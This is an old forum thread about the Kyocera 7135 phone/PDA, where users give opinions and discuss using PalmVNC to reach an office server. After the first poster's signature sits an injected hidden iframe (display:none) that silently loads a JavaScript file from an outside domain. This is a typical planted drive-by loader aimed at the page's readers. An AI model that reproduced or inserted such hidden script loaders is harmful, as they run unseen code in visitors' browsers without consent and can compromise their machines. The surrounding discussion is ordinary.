+ Reply to Thread

7135, is it for me?

Never used a laptop, never really had a need for a portable computer however, I AM a help/support person for a cdma provider in canada that WILL be using this phone on our network. I get alot of stuff to test at work etc but what I want to know will this unit delight, educate and help me learn about the advanced functions of the evolving market of data/voice in the industry of wireless, OR should I wait for something else this year.

I love the way it looks, and the color etc, but wanted some expert opinions here.

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is the state of the art in a phone/pda convergence device for those who want something weighted towards the phone. While there is always something better coming down the line. This phone has delighted, educated and helped a lot of people looking for something that can handle both data and voice.

Converged. It didn't even hurt! tuckeyr's Avatar
    This is a TERRRIBLY useful phone! I have it set to serve as a wireless modem for both windows and mac laptops, I use it to VPN into my office servers for admin purposes, and of course, all of the Palm features are invaluable. Yes, it will delight, educate and help you learn about the advanced functions of this evolving market. I have learned TONS just since I got it!
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

Trying to identify the best vpn client out there to access my corporate serers. Currently use a a cisco client for my office PC to get connectivity to exchange server.

tuckeyr, what vpn client do you use with the 7135? Is it easy to set-up? Any thoughts for a novice?

Thanks - Joe

Converged. It didn't even hurt! tuckeyr's Avatar
    jberkowitz, I am using PalmVNC to access my exchange server, but only to remotely control the server, NOT to read my Outlook e-mail. I need to open a port in my firewall to access it, but once that was done, it connected immediately. I found it very easy to set up and use. It's from Harakan Software. I got it from: www.uk.research.att.com/vnc/

The documentation was good, and it was VERY simple to use.
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!